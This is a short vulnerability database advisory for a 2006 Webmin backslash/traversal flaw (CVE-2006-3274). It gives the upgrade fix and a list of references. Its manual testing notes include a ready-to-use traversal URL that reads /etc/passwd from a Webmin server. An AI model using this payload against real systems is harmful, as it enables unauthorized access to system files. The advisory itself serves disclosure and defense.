Webmin Crafted Backslash Request Traversal Arbitrary File Access

2006-06-23T04:34:15
ID: OSVDB:26771
Type: osvdb
Reporter: OSVDB
Modified: 2006-06-23T04:34:15

Description

Solution Description

Upgrade to version 1.290 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd

References:

Vendor URL: http://www.webmin.com/
Vendor Specific News/Changelog Entry: http://www.webmin.com/changes.html
Security Tracker: 1016375
Secunia Advisory ID: 20777
Other Advisory URL: http://www.lac.co.jp/business/sns/intelligence/SNSadvisory_e/88_e.html
Other Advisory URL: http://jvn.jp/jp/JVN%2367974490/index.html
Nessus Plugin ID: 21785
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0480.html
Mail List Post: http://attrition.org/pipermail/vim/2006-June/000910.html
Mail List Post: http://attrition.org/pipermail/vim/2006-June/000912.html
Generic Exploit URL: http://securitydot.net/xpl/exploits/vulnerabilities/articles/1152/exploit.html
FrSIRT Advisory: ADV-2006-2493
CVE ID: CVE-2006-3274
Bugtraq ID: 18613